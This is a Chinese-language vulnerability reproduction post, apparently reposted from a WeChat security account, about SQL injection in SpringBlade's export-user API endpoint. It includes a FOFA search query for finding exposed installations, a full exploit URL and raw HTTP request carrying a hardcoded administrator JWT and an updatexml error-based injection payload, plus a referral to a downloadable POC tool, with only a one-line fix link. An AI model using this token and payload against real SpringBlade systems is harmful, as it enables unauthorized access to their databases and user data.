SpringBlade export-user接口存在SQL注入漏洞附POC软件

admin

102673
文章

87
评论

2024年1月24日16:28:49评论122 views字数 2267阅读7分33秒阅读模式

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

大家关注一下我的另外一个公众号，这个公众号也会发POC，两个公众号发的漏洞不一样，基本每天更新。

1. SpringBlade系统简介

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发

SpringBlade 是一个由商业级项目升级优化而来的微服务架构采用Spring Boot 2.5 、Spring Cloud 2020 等核心技术构建，完全遵循阿里巴巴编码规范。

2.漏洞描述

SpringBlade 是一个由商业级项目升级优化而来的微服务架构采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建，完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。SpringBlade export-user接口存在SQL注入漏洞。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

SpringBlade

SpringBlade export-user接口存在SQL注入漏洞附POC软件

SpringBlade export-user接口存在SQL注入漏洞

4.fofa查询语句

body="https://bladex.vip"

5.漏洞复现

漏洞链接：http://127.0.0.1/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account=&realName=&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

漏洞数据包：

GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account=&realName=&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1 HTTP/1.1
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Host: 127.0.0.1

SpringBlade export-user接口存在SQL注入漏洞附POC软件

6.POC&EXP

关注公众号南风漏洞复现文库并回复漏洞99 即可获得该POC工具下载地址：

SpringBlade export-user接口存在SQL注入漏洞附POC软件

本期漏洞及往期漏洞的批量扫描POC及POC工具箱已经上传知识星球：南风网络安全

SpringBlade export-user接口存在SQL注入漏洞附POC软件

7.整改意见

⼚商已发布了漏洞修复程序请及时关注更新：https://github.com/chillzhuang/blade-tool

原文始发于微信公众号（南风漏洞复现文库）：SpringBlade export-user接口存在SQL注入漏洞附POC软件

左青龙
微信扫一扫

右白虎
微信扫一扫

SpringBlade export-user接口存在SQL注入漏洞附POC软件

1. SpringBlade系统简介

2.漏洞描述

3.影响版本

4.fofa查询语句

5.漏洞复现

6.POC&EXP

7.整改意见

原文始发于微信公众号（南风漏洞复现文库）：SpringBlade export-user接口存在SQL注入漏洞附POC软件

【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

LiveGBS user/save存在逻辑缺陷漏洞(CNVD-2023-72138)

Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198)

YzmCMS pay_callback.html存在远程命令执行漏洞

WordPress Automatic插件存在SQL注入漏洞(CVE-2024-27956)

onethink安全漏洞(CVE-2024-33443)

MajorDoMo 未授权RCE漏洞

QVD-2024-15263禅道项目管理系统身份认证绕过

某直辖市HW三甲医院公众号越权漏洞泄露8W+个人信息

禅道项目管理系统身份认证绕过

发表评论

在线咨询

微信

1. SpringBlade系统简介

2.漏洞描述

3.影响版本

4.fofa查询语句

5.漏洞复现

6.POC&EXP

7.整改意见

原文始发于微信公众号（南风漏洞复现文库）：SpringBlade export-user接口存在SQL注入漏洞 附POC软件

发表评论

在线咨询

微信

原文始发于微信公众号（南风漏洞复现文库）：SpringBlade export-user接口存在SQL注入漏洞附POC软件